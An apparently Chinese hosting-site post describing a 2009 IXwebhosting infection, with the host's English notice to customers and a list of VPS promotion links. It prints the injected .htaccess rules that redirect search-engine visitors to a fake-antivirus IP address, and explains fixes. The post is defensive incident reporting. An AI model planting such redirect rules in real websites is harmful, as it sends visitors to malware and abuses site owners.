关于IXwebhosting上出现的安全问题
![]() | ![]() | ![]() | ![]() |
| 【性价之王】 | 【线路之王】 | 【价格之王】 | 【配置之王】 |
| 【免费之王】 | 【香港首推】 | 【梯子之王】 | 【独服之王】 |
症状:直接进入网站没有问题,从google等国外著名搜索引擎进入网站就会转向到一个病毒网站。
具体例子请看: http://bbs.idcspy.com/thread-36706-1-1.html
原因: 网站的.htaccess文件被修改,会加入如下代码:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]
上面的代码就是判断访问者来源,如果是来自上面那些搜索引擎,就自动转向
解决方法: 修正.htaccess,并且去掉.htaccess的写入权限。同时修正根目录的权限,去掉写入权限。
来自IXwebhosting官方的信息,此安全隐患已经得到修正,他们也杀掉了服务器上大部分此类病毒,如果还有问题,请联系ixwebhosting检查。被感染的原因可能是由于你的ftp密码被盗,进而被修改网站文件。
下面是ixwebhosting关于此问题发给用户的信件:
In our ongoing commitment to the security of our customers, we have discovered a vulnerability located within many of our client’s websites, including yours. This is a self replicating virus which is found by visiting well-known search engines. When you click on any link it may redirect you to a fake Anti-Virus 2009 website which appears to scan your system and then asks you to download the software. Once downloaded and installed it begins displaying pop ups on your desktop. At this time it collects your FTP user name and password from your own computer and uses that information to upload an exploited file named “.htaccess” to your website. Any visitors to your website will then be redirected to the fake anti-virus website.
We have dedicated our systems administration team to finding a solution to this and are happy to say that as one of the first hosting companies we have successfully cleaned all instances of this virus from our servers more than a week ago, and are continually scanning them to ensure your site does not become re-infected.
While your website is now secure, your computer may still be at risk. Here are two easy steps that will detect and remove this malicious software from your computer and make sure your website will not spread the virus again:
1. Uninstall the fake Anti-Virus software by following the instructions at this link:
http://www.bleepingcomputer.com/ … tall-antivirus-2009
2. Once removed, change your FTP password from within your web hosting control panel. Once logged in, click on the FTP Manager icon and then on the icon next to the password to change it.
To illustrate the severity of the issue I would like to share some facts with you:
* 26,991 of our customers have been infected with fake Anti-Virus 2009
* 79,469 websites have been spreading the Anti-Virus 2009 infection
* 120,923 malicious files have been removed from our system
We are constantly monitoring our servers for potential threats to your website, and are proud to say that we are among the first web hosts to identify this particular problem, and have been the first to offer a resolution. Your continued and safe presence on the internet is our top priority.
If you have questions regarding any of this information, please contact our support team anytime.
Kind Regards,
Fatima Said, CCO
IX Web Hosting
猜你可能想看的VPS
- SkylonHost→€4.99 月 2 核 3GB 内存 35GB S虚拟空间(主机)
- 腾讯云服务器岁末有礼:1 核 2G 2 核 4G 云服务器首年 99 元全球[VPS测评]
- [黑五]Sharktech→独立服务器月付 44 美元起 VPS 年付 独立服务器[U]
- 禁止 vim 复制内容缩进的办法全球[VPS测评]
- hostworld→英国 KVM VPS 免费送 15%内存和 30%空虚拟空间(主机)
- 企鹅小屋→400 元 月 E5-2630L 16GB 内存 240GB 香港VPS[主机]
- WattaServer→$50 月 E3-1270v1 8GB 内存 1全球[VPS测评]
- 腾讯云最新优惠活动→十月有礼 每日 10 点开始抢购 1G 内存 VPS全球[VPS测评]
- 企鹅小屋→99 元 年 1GB 内存 10GB SSD 空间 200GB虚拟空间(主机)
- 腾讯云每日 5 场秒杀→1C2G1M 三年 268 元 2C4G5M 三香港VPS[主机]
- JQuery ajax 中 serialize()方法增加自定义参数全球[VPS测评]
- 原生 IP $22.4 月 2 核 1.5G 内存 20G SSD 3T日本VPS[主机]
- 腾讯云服务器 2020 年 2 月低价促销活动,2 核 4G3M998 全球[VPS测评]
- 触摸云香港CN2GIA线路/10M带宽 ¥26起/月;美国200G高防¥美国VPS[主机]
- 2022年GigsGigsCloud最新优惠码,推荐香港/洛杉矶/日本C日本VPS[主机]
- 其云否特价 VPS 768M内存,35G硬盘,2T流量,电信双向CN2G全球[VPS测评]
- HostItBro → 5$ 月 1C2G20G硬盘 1Gbps20T流全球[VPS测评]
- RFCHOST 香港HKG VPS 三网直连 CMI回程香港VPS[主机]
- BuyVM → 卢森堡 DMCA友好 无限流量全球[VPS测评]
- Wikihost CN2 香港虚拟主机 → 独立IP → 限量446元独立服务器[U]
- kvmcloud怎么样?香港BGP云服务器 月付12.9元香港VPS[主机]
- 景林网络:香港CN2vps,1核1G3M月付35元;美国高防vps,48美国VPS[主机]
- 人们为啥不爱吃海底捞了?海底捞上半年亏损达2.97亿 网友神评扎心全球[VPS测评]
- 香港站群服务器租用推荐,香港多IP服务器/VPS套餐(站群需求)站群服务器[IP]
- 拼多多也要做跨境电商?出海之路能一帆风顺吗,了解一下全球[VPS测评]
- 印象云怎么样?85折香港安畅CN2vps带宽3M月付23元香港VPS[主机]
- 个人如何做跨境电商?全球[VPS测评]
- 香港vps免费:青云互联,1核1G/50G硬盘/500GB流量/2M带宽香港VPS[主机]
- 云计算拯救互联网巨头?全球[VPS测评]
- Fatal error: Allowed memory size of 全球[VPS测评]
转载请注明原文地址:http://140.238.13.167:12355/read-98853.html











